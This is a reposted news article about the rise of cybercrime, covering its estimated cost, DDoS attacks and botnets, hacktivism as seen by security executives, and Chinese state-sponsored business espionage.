The one thing no one is really able to explain is why cybercrime's booming. According to a recent Norton Study, cybercrime cost the global economy (in both direct damage and lost productivity time) $388 billion in 2011--significantly more than the global black market for marijuana, cocaine, and heroin combined. Officials at the Department of Homeland Security have reported exponentially increasing demand for cybercrime assistance --something confirmed by this reporter in anecdotal discussions with online security experts.

Every single expert has a different theory. Some say it's due to a global economy that's putting programmers out of work and turning them rogue. Others say it's the easy availability of computers in poor regions of the world where job prospects are few. Then others say it's simply that scripts and DDoS attacks have democratized cybercrime.

DDoS attacks--and their first cousins, botnets--are one of the biggest culprits. Most DDoS attacks are amazingly simplistic; they are denial-of-service attacks frequently made via software that requires no programming or IT knowledge. Botnets are impromptu networks of Internet-connected computers turned rogue via malware. Once a computer is compromised, it can be used for everything from financial fraud to knocking websites offline. Reached by email, Carl Herberger of security firm Radware put much of the blame on hacktivists such as Anonymous.

"The motive for attacks has changed and this new motive brought with it new tools and attack techniques," Herberger tells Fast Company. "These new motives--frequently called 'Hacktivism'--are in a new category which will go down in the record books as one of the most active periods of cyberattacks in the history of information security. Given the current efficacy of ideologically-based multi-vulnerability attacks such as WikiLeaks revenge attacks of 2010 and the Sony attacks of 2011, we believe this will only serve to encourage even more actors to enter the picture and spawn a vicious cycle of future malicious activity."

While the idea that politicized groups such as Anonymous are malicious and/or criminals is controversial, many security experts agree with Herberger. At the recent Kaspersky Lab Cyber Conference in Cancun, CEO Eugene Kaspersky compared hacktivists to radicals who plant car bombs and commit arsons in the name of ideology. Similar alarms were raised in an end-of-year letter from risk management firm Stroz Friedberg, which largely conflated hacktivism with threats like state-sponsored data theft and zero-day exploits.

As for state-sponsored data theft, the New York Times just reported on the lengths to which American companies go to avoid Chinese cyber espionage. American businesspeople, consultants, and politicians working in China avoid bringing their work computers into the country and use throwaway mobile phones--to name the most common tricks--in order to avoid the loss of business secrets to state-sponsored corporate spies. While China is the most blatant nation-state to engage in spying on foreign businesses for the benefit of homegrown companies, it isn't uncommon. Russia, France, Israel, Taiwan, and others have also been alleged to engage in the process.

Still, the world of malware, bots, cyber espionage, piracy and much more has become a center of attraction.

Stay Safe

Thanks to - NEAL UNGERLEIDER for this wonderful article